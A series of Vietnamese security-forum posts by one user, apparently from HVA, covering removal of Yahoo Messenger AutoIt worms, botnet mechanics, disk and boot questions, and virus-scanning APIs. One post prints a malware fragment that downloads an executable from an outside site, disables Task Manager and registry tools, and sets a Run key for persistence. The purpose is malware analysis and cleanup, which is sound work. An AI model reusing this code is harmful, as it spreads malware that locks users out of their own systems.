Messages posted by: mfeng

Bị chặn Task Manager & Command Prompt & một số 3rd party softwares khác thì phải trong trường hợp cụ thể Virus gì, nó chặn như thế nào thì mới biết cách deactive nó được. Không có cơ chế chung tắt process cho mọi loại virus sau khi đã bị lây nhiễm.

Exploit trên có payload chỉ exec calc.exe làm demo. Có thể sử dụng các payload khác như payload download & exec file, payload get remote shell... Tuy nhiên exploit này (cũng như một số exploit gần đây) sử dụng kỹ thuật Heap Spraying, khi exploit code được thực thi thường tốn rất nhiều bộ nhớ, có thể gây treo hệ thống và dễ gây nghi ngờ cho victim smilie

.

Nhìn cái cover của Collection này chợt nhận thấy trên đó ghi:

ROOKIE_COMALE

smilie

)

ducbinh1986 wrote:

yêu cầu của bài : tìm và viết 1 số đoạn chương trình mà hệ điều hành dùng để đọc các cluster,Cluster....,cách đọc dữ liệu trên định dạng Fat và NTFS,cách đọc thư mục gốc,thư mục con.
nói chung là cách mà hệ điều hành đọc dữ liệu trên đĩa cứng v..v (nhưng phải ở dạng đoạn chương trình )

Bạn đọc tài liệu về cấu trúc của FAT32, NTFS, sau đó sử dụng Int 13h Extension là hoàn toàn có thể viết được chương trình đọc file, thư mục từ cluster của các FileSystem này.

Tài liệu mô tả chi tiết NTFS ở đây: http://www.linux-ntfs.org/
FAT32: có trong MSDN hoặc nhiều nguồn khác (dùng google)

Nếu bạn học về Asm for Win32 thì nên đọc http://win32assembly.online.fr/, sẽ hướng dẫn từng bước cách viết một chương trình trên Win32 bằng assembly như thế nào.
Yêu cầu: bạn phải có kiến thức nhất định về lập trình API trên Windows (Win32 API programming).

Coi có file copy.exe trong thư mục gốc cùng với file autorun.inf không ? Dùng av (nhớ update) scan file exe đó. Nếu không phát hiện gì thì cứ đưa file exe lên đây smilie

.

LeVuHoang wrote:

Fluoros wrote:

Xin lỗi mọi người,em chưa biết gì về IT cả . Em mới đang tập làm quen thôi. Em viết cái phần anti kia không phải để share rộng rãi. Bạn bè em cần thì em mới share.Vì đợi BKAV thì lâu quá. Em thành thật xin lỗi mọi người .
Nhưng em thấy anh LVH là mod . Chưa check mà đã bảo là virus mới. Có lẽ anh chỉ muốn mọi người download phần mềm anh tạo thôi. Em hơi bức xúc khi chưa check mà đã nói thế .

hi,
Hoàng thừa nhận là có sơ xuất vì không check kỹ (lúc đó 4:00 AM roài ). Sory bạn
Nhưng 1 câu hỏi là, sau khi nhấn nút Scan, cái Process AntiVirusYahoo vẫn còn chạy (ngầm) là thế nào ?

@Fluoros: Chương trình bạn viết "lặp vô hạn ", có tạm dừng 60s để download file text chứa tên file virus về và kill process, liệu có cần thiết như vây không? Giả sử một user nào đó chạy chương trình của bạn, nếu trong file txt bạn ghi tên các tiến trình quan trong của Windows, thì Windows của user kia sẽ ra sao?

Vài góp ý :wink:

Và giả sử App AutoIt bị pack thêm một lần nữa bằng packer nào đó thì sao nhỉ ?

father_nghia_den wrote:

Chính xác là link này đây anh Hoàng.

bai` hoc kinh nghiem ==>Chet' ko duoc lam` con ma doi'===>... http://www33.websamba.com/xomnuocden/dungdedoi.html

Tất cả các dấu hiệu giống hệt những con virus dựa trên code gái xinh.
Khoá taskmanager , run , send link hàng loat. v.v

Virus này viết bằng AutoIt, có đính kém một trojan, sau đó đóng gói lại theo WinRAR SFX. Vì vậy IE-Protector không phát hiện được file đóng gói là AutoIt.

Nhưng nếu sau khi virus đã thực thi (file YIMBot.exe), IE-Protector có thể phát hiện được khi tiến hành quét bộ nhớ..

ducnamnv wrote:

- Em muốn lập trình 1 chuơng trình tìm diệt 1 file nào đó(virus, trojan mà em biết) thì lập trình như thế nào để scan 1 ổ đĩa cứng ? các ổ đĩa trong máy hoặc 1 thư mục chỉ định (scan như các chương trình Antivirus vẫn hay làm ấy)

Trong Windows, bạn dùng các hàm FindFirstFile, FindNextFile để duyệt cây thư mục. Gọi hàm GetLogicalDrives để lấy danh sách các ổ đĩa.

Nói riêng cho vấn đề AutoIt SPIM: Các virus dạng này gửi IM thông qua cách giả lập phím tắt (shortcut keys) của YIM như Alt-M, u... (để đặt status msg). Hàm Send (hàm gửi phím tắt) của AutoIt thực sự bên trong gọi hàm WinAPI là keybd_event.

Để ngăn cản khả năng gửi IM hàng loạt, từ mô tả ở trên sinh ra một ý tưởng là hook API hàm keybd_event. Nếu active window đang là YIM, module hook sẽ ngăn hoạt động của keybd_event, còn lại sẽ cho qua.

Có một vướng mắc trong phương án trên: một số trình gõ tiếng việt (Vietkey, Unikey) sử dụng keybd_event để gửi ký tư. Do vậy nếu block keybd_event, sẽ không gõ tiếng Việt trong YIM được nữa.

smilie

Hướng dẫn remove virus trên vuichoivn.com:

1. Kill process guitangban.exe (file virus chính).
2. Kill process taskmng.exe (trojan)
2. Xoá file taskmng.exe trong %Windows%
3. Chạy file script để khắc phục các sửa đổi registry do virus gây ra: http://www.bkav.com.vn/download/fix_reg.vbs.

(Do virus này sửa đổi regisstry tương tự các biến thể trước đó, nên fix_reg của bkav vẫn sử dụng được.)

Với virus trên traoluumoi.com/YMBEST/:
Msg của virus này là:
Code:

HOT HOT HOT !!! Toan nhung girl xinh cua cac truong PTTH !!! ...

1. Kill process YMBEST.exe
2. Xoá file YMBEST.exe trong %Windows%
3. Fix reg tương tự như trên.

Chú ý:
1. IE chưa fix lỗi MS06-014 sẽ bị nhiễm virus ngay khi vào các website chứa virus trên. Download bản fix MS06-014 tại http://www.microsoft.com/technet/security/Bulletin/MS06-014.mspx
2. Người dùng firefox không bị ảnh hưởng.

Mới thêm một biến thể từ h**p://vuichoivn.com

[Mô tả]
- Ngay khi vào site trên, file guitangban.exe sẽ được thực thi. Đây là một virus viết bằng autoit, có các chức năng sau:
+ Gửi tin nhắn hàng loạt qua YIM, nội dung là một msg ngẫu nhiên trong số:

- Moi lam website nay, moi nguoi cho y kien
- Nghe nhac Audition da^y
- Nghe nhac Viet Nam mien phi, moi lam hom qua
- Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen...
- Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao...
- Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon...
- Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo...
- Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi...
- Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa...
- Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau?

Kèm thêm link tới h**p://vuichoivn.com

- Đặt các value trong registry:

lQ đã remove code phá hoại.

- Download file guitangban1.exe về, ghi ra file taskmng.exe đặt trong %WINDOWS% : Đây là một trojan

[Một số thông tin ngoài lề]
Code:

; <AUT2EXE VERSION: 3.2.0.1>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: D:\Documents and Settings\Le Quang Trung\Desktop\guitangban.au3>
; ----------------------------------------------------------------------------
; <AUT2EXE VERSION: 3.2.0.1>
; ----------------------------------------------------------------------------
; <AUT2EXE INCLUDE-START: D:\AutoIT\Projects\Adware\DKC.au3>
; ----------------------------------------------------------------------------
;--------------------------------------------
; Tac Gia: Kevin Duong - KVD
; Phan Mem: DKC Bot
; Phien Ban: 1.1
; Cong Dung: Quang cao Website thong qua Y!M
; Phat Hanh: 1-9-2006
;--------------------------------------------

->Code này được lấy từ code gốc của KVD
- "Tác giả" của vuichoivn.com là Le Quang Trung smilie

@eiseis:
Tớ dùng OllyDbg.

h**p://viet8x.evonet.ro/task.exe:

Code:

xxx

PS: Do code có tính chất phá hoại nên HVA remove.
Thangdiablo

daokhuc.be ->

...
;--------------------------------------------
; Tac Gia: Kevin Duong - KVD
; Phan Mem: DKC Bot
; Phien Ban: 1.1
; Cong Dung: Quang cao Website thong qua Y!M
; Phat Hanh: 1-9-2006
;--------------------------------------------
...
$website = "http://daokhuc.be"

; Lay Nhiem Vao He Thong
If Not FileExists(@WindowsDir & "\taskmng.exe") Then
InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1)
Sleep(5000)
EndIf

; Ghi Khoa Registry
RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website)
RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "Dao Khuc Community :: Chut gi de nho...")
...

Messages:

1. "Nguoi ra di vi anh da mang lam lo hay tai vi anh day qua ngheo? Chang the trao ve em duoc nhu long em luon uoc mo, giac mo giau sang... "
2. "Ngay khong em anh day lam sao cho het ngay? Sang dem duong nhu chi co anh voi anh quay quang... "
3. "Om bau dau thuong, minh anh co don chon day. Ngay mai em ra di, chon giau bao ky niem... "
4. "Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen... "
5. "Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao... " & "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... "
6. "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... "
7. "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... "
8. "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... "
9. "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? "

!

Norton hay Bitdefender có thể không detect ra virus viết trên AutoIt, nhưng cái con keylogger mà virus download và copy vào Windows thì vẫn bị tóm gọn smilie

.

Lỗi theo mô tả thuộc về module vmapplib.dll, được gọi thông qua ActiveX của vmdbCOM.dll.

Đã kiểm tra trên VMWare 5.5.1 build 19175 và VMWare 5.5.2 build 29772, kết quả giống nhau:
- Crash tại module vmapplib.dll, đóng IE.
- Debug: có vẻ giá trị eax trong lệnh call [eax] bị sai, không trỏ tới đoạn mã cần thiết ?

Nếu bạn đã (hay dự định) cài đặt WinXP trên phân vùng active C:\, và muốn có khởi động Command Prompt (DOS), phân vùng active của bạn bắt buộc phải format theo FAT32, vì DOS không đọc được NTFS.

Trường hợp khác, nếu bạn cài đặt WinXP lên một phân vùng khác, phân vùng này có thể để định dạng NTFS được, nhưng phân vùng active chắc chắn vẫn phải để là FAT32.

Theo cách tớ đạng sử dụng, HDD bao gồm các phân vùng chính sau:
- Phân vùng 1 (primary, active): FAT32, có chứa các file Command.com. io.sys, msdos.sys; boot.ini, ntldr, ntdetect.com
- Extended:
+ Phân vùng 2: NTFS, chứa hệ điều hành Windows XP,
+ .....

Nếu cài đặt từ đầu, các bước diễn ra tương tự như bạn lieuphieu đã mô tả, chỉ đôi chút khác là sẽ setup WindowsXP lên phân vùng thứ 2, thay vì phân vùng thứ nhất (C smilie

Trường hợp bạn đã có windows XP rồi, và không muốn cài đặt lại, có thể làm theo các bước sau:
1. Kiếm một đĩa mềm (đĩa CD) khởi động được vào DOS.
2. Tại command prompt, gõ
sys C:
Lệnh trên sẽ copy các file khởi động của DOS (command.com, io.sys, msdos.sys) vào C:\ (bạn kiểm tra lại sau lệnh sys nhé, chú ý một số file có thuộc tính Hidden). Đồng thời lệnh sys cũng sửa đổi MBR & Boot Record của phân vùng C:, cho khởi động được vào DOS. Lúc này, sau khi restart, bạn sẽ vào thẳng trực tiếp DOS, không vào được WinXP nữa
3. Để fix sao cho vẫn vào được WinXP, bạn lấy CD setup WinXP, boot và chọn chế độ Recovery Console. Tại command prompt, bạn gõ lệnh fixmbr, fixboot, và cuối cùng là bootcfg /rebuild. Restart máy.
4. Có thể kiểm tra nội dung boot.ini để biết rõ về các mục chọn ở menu khởi động.

Tham khảo các lệnh của Recovery Console tại http://www.michaelstevenstech.com/r_c_cmds.htm.

Hi baby_hn,

Ping, net, netstat là các lệnh ngoại trú, nghĩa là có file thực thi riêng. Bạn kiểm tra trong %WINDOWS%\System32 xem có các file .exe tương ứng hay không. Thông báo lỗi trên cho biết OS không tìm thấy file thực thi tương ứng với lệnh, cũng không thấy lệnh trong danh sách các lệnh nội trú.

Thân mến.

Mô hình hoạt động của một botnet như sau:
- Các auto-bot (thường là virus, trojan...) sau khi đã lây nhiễm vào một máy tính của người sử dụng nào đó, sẽ kết nối tới một IRC channel định sẵn trong mã lệnh, tại một IRC server nào đó. Các auto-bot này thực chất là một IRC client, sử dụng http://www.irchelp.org/irchelp/rfc/rfc2812.txt để join vào channel (thường là có đặt password).
- Khi người nắm quyền điểu khiển channel cũng join vào channel này, anh ta có thể gửi một thông điệp nào đó cho các client đang join tại đây (là các bot trên các máy tinh zombie). Tuỳ theo giao thức đã quy ước trước mà bot nhận được thông điệp nào sẽ làm công việc tương ứng: Ping, Get System Info, Update, remove, get key logs... Như vậy, thông qua IRC channel, một người có thể điều khiển toàn bộ các máy tính zombie bị cài đặt bot.

Do đặc điểm hoạt động, khi một zombie phát hiện ra bị cài đặt bot, một reverser có thể dò tìm ra mạng botnet nào mà zombie bị điều khiển, khả năng của bot, các lệnh mà bot nhận được.. , bằng các kĩ thuật RE & sniffer packet. Các thông tin này sẽ có ích để xử lý, ngăn chặn botnet.

Theo một nghiên cứu của honeynet cách đây vài năm, đã ghi nhận được một số botnet có khoảng 250000 zombies smilie

.

jamesmr wrote:

vậy you giải thích cái này thế nào:
* Identd request from 66.225.200.63
-
Closing Link: [125.234.71.112] Z:Lined (subnet banned due to Floods and Spam)
-
* Disconnected
lúc trước tôi connect bình thường,tư ngày tăng lên 30 bot thì nó thế này.

To jamesmr:
Có thể một số IRC server, để tránh nguy cơ "tiếp tay" cho việc điều khiển botnet, đã giới hạn số client kết nối tới server thông qua IP của cùng một subnet. Điều này là dễ hiểu, vì khi một subnet (trong LAN chẳng hạn, kết nối internet qua NAT) bị nhiễm virus botnet, thì thường số lượng lớn máy tinh của subnet tiến hành kết nối tới một IRC server, tăng số lượng kết nối đạt mức tới hạn cho phép của IRC server, và tình huống bị từ chối kết nối sẽ diễn ra.

Thân mến.

Hi jamesmr,

Đoạn code trên compile bằng gcc trên linux hay tương đương. Hoặc bạn có thể compile trên cygwin chạy trên Windows 2k/XP.

Hi meovonchuot,

Bạn cần format ổ đĩa C:\ từ boot đĩa mềm? Tức là không cần quan tâm tới dữ liệu trên ổ C:\ ?. Nếu thế, bạn có thể dùng 2 tiện ích cũ của Windows 9x, copy vào đĩa mềm được. Đó là fdisk và format: trước hết dùng fdisk xoá phân vùng của C: đi, sau đó tạo lại một phân vùng mới, chưa format vào đó; tiếp theo bạn dùng format để định dạng phân vùng này theo FAT32.
Chú ý: dữ liệu trên ổ C: sẽ bị mất sạch khi dùng phương pháp này

Nếu cần giữ lại dữ liệu khi chuyển đổi NTFS->FAT32, bạn dùng PQMagic hay chương trình tương tự.

Thân mến.

To ChinhVn,

Bạn đề cập đến website nào, ghi rõ địa chỉ ra đây được không?

Hiện tượng reset xảy ra thường do vr phát hiện ra title các window có từ khoá nhạy cảm: virus, cmd, registry, update, ... (đại loại như thế). Mình không nghĩ một vr dạng jscript lại có thể làm được như thế, khả năng là có một tiến trình (exe) là file vr chính thực hiện điều này. Bạn thử tìm kiếm bằng process explorer (hoặc chương trình tương đương) xem sao. Chú ý: có thể chạy Process Explorer cũng bị reset (vì có chữ "Process", nhỡ đâu :-D).

Bạn thử tìm trong subkey sau có giá trị "DisableCMD" không?

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]

Bạn down nmap source code rồi. Muốn dùng được bạn cần phải compile src này ra file thực thi.

Nếu ngại compile, có thể download trực tiếp file nmap command line ở http://download.insecure.org/nmap/dist/nmap-4.11-win32.zip

Mặc định, các thư mục, file màu xanh là dạng mã hóa (encrypt) trên ổ đĩa phân vùng NTFS. Bạn không mở được file, thư mục này có thể do không đủ quyền. Kiểm tra trong tab Security của phần Properties các file, thư mục đó để biết phân quyền truy cập như thế nào.

Bạn update virus definition mới nhất của AV đang dùng, rồi scan file .eml đó coi có phát hiện ra loại virus nào không. Nếu không thấy gì, hãy đưa file .eml đó lên đây.